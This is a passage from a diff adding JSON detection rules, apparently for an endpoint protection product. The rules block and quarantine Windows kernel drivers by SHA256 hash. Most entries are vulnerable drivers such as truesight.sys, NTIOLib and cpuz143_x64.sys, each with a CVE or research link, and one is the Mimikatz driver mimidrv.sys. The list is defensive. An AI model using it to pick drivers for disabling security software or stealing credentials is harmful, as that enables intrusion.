"d633055c7eda26dacfc30109eb790625519fc7b0a3a601ceed9e21918aad8a1b", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "457eabaa-fe04-5090-89b5-5f2cd7bd3e36", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823899Z", + "creation_date": "2026-03-23T11:45:30.823901Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823907Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4bfb584ae2dd1bba593ac142b6c9a1a2640955759b72123ee7b58f8eaaa9f748", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45887fa2-ce12-5791-9b0c-e836976d9a9f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827622Z", + "creation_date": "2026-03-23T11:45:31.827624Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827630Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1d560040819f308d820032547d9ad1cf11fdfbb400241bf877e6f5e51900710", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "459189c9-317c-5e00-ae48-ba457e6a168b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815197Z", + "creation_date": "2026-03-23T11:45:31.815199Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815204Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "571c3cebc7009f1243b97dd381962e78d736b209955f8c2e5a30d970c155f3f7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45af8571-3d48-525f-b480-ffa43e8a14aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827380Z", + "creation_date": "2026-03-23T11:45:30.827382Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827387Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b366e96694d76b1947ed0e22b574f39cbe0b6d352851b720825b8a0df1aafa51", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45b0f535-3779-51fb-a9d2-9678488937b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614700Z", + "creation_date": 
"2026-03-23T11:45:29.614702Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614708Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45b8251c-2d88-589a-b737-2e6d1e6c782c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828423Z", + "creation_date": "2026-03-23T11:45:31.828425Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828430Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4359b5925ca4333933552b4c44efe4f9d9378e54df71f7c70a9e2fdb20c2bbb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"45c30462-2dfe-54f7-b520-75808fe202bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811204Z", + "creation_date": "2026-03-23T11:45:31.811206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811212Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33021ab48739c767cabe762c52a7720fafdd796f8b86027000cbcce295b04458", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45c3597a-d563-5126-84f8-f26aefb09714", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160830Z", + "creation_date": "2026-03-23T11:45:31.160832Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.160838Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05f535063639c8bdfd1ef2054bff3f58ef9f4f30e88d7eeecb9f8ee915be535e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45d06e78-c471-5ae4-82ac-b14c298f662f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156672Z", + "creation_date": "2026-03-23T11:45:31.156674Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b76bdd3647d1124d3e750092a5bfaffa26b6c4f79e0891188c167f97ccb78675", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45f62cec-5051-5f7b-a9f9-3df131519b39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821815Z", + "creation_date": "2026-03-23T11:45:30.821818Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821827Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "665b45ff2a2054ffdb3ea55031802c1d7fd3db843ecbcf74b227e0200b37cd56", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45f69431-1fe9-57bf-b081-fe01af4598e8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486997Z", + "creation_date": "2026-03-23T11:45:31.487000Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487008Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "5f437fc04c721810d1885248c8f6caa1438e3af339502d2319dd3fca265fcad7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46000d63-b246-570c-9312-3f794e710c45", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148520Z", + "creation_date": "2026-03-23T11:45:31.148522Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148527Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e85fc55ac3ccd0525ca75e38f2b014d292e49fe6a3d795ff1714600e7120eb02", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46013a0a-36d1-5140-abd5-83690ddb64b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492945Z", + "creation_date": "2026-03-23T11:45:31.492955Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492964Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e57d43143afad8fbefa89a9a9da758e3e22bb56c75f337dc78517a633716407", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "460187ee-1b30-5c92-a3cd-0d53b85c4095", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.147022Z", + "creation_date": "2026-03-23T11:45:32.147024Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.147029Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0", + "comment": "Vulnerable Kernel Driver (aka 
ThrottleBlood.sys) [https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4613b875-0d91-5a2c-b65d-7ff847735fc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606192Z", + "creation_date": "2026-03-23T11:45:29.606194Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606199Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88e2e6a705d3fb71b966d9fb46dc5a4b015548daf585fb54dfcd81dc0bd3ebdc", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46197192-f5c9-53ab-8c11-a765e383da3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614998Z", + "creation_date": "2026-03-23T11:45:29.614999Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615005Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "461a88fe-467f-5879-a1ab-0f061f0ae7cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610898Z", + "creation_date": "2026-03-23T11:45:29.610900Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610905Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "461fb871-c844-5066-8f78-7de76b501241", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814602Z", + "creation_date": "2026-03-23T11:45:31.814605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814614Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a9293cc70bc90846a6a22e6b6b2db2c5c6a15c9607646a97277d0b2efc64191d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "462d378c-22a9-5cf7-a851-c72a93328ae8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464424Z", + "creation_date": "2026-03-23T11:45:30.464427Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464436Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "52f3905bbd97dcd2dbd22890e5e8413b9487088f1ee2fa828030a6a45b3975fd", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4641820e-ef98-555c-80a7-466b06a7765f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817569Z", + "creation_date": "2026-03-23T11:45:31.817571Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817577Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bbfcfb9793d8c06af261bdb80838a5b8d4a6623bd99207511179e49af015eb7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "464a351e-996d-5c37-a861-927ae7688a82", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817187Z", + "creation_date": "2026-03-23T11:45:31.817189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817195Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79d14e50c465c3d395d636876edbbbe305843c745180f6cda854db28c97d4990", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "466d4cc1-2fc4-509b-a5d9-a32a6e3b7f6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980323Z", + "creation_date": "2026-03-23T11:45:29.980325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980331Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c2d2122ef7a100e1651f2ec50528c0d1a2b8a71c075461f0dc58a1aca36bc61", + "comment": 
"Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4678d189-f7e0-5062-9e72-c7c2aa9675b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454153Z", + "creation_date": "2026-03-23T11:45:30.454156Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454165Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "367035e87b8a361bdc51f55a2467b2606eb29feae3af892d8c17df1841c20b97", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4681e49b-3a92-5ed3-9955-eee7b359aa2c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622862Z", + "creation_date": 
"2026-03-23T11:45:29.622864Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622881Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "542cd21b0c835b818e6b2eea2efe5b340ff3d554b2b7e13af084f0817cc920fd", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4688935a-aa68-54bb-8403-ccd265f93dec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 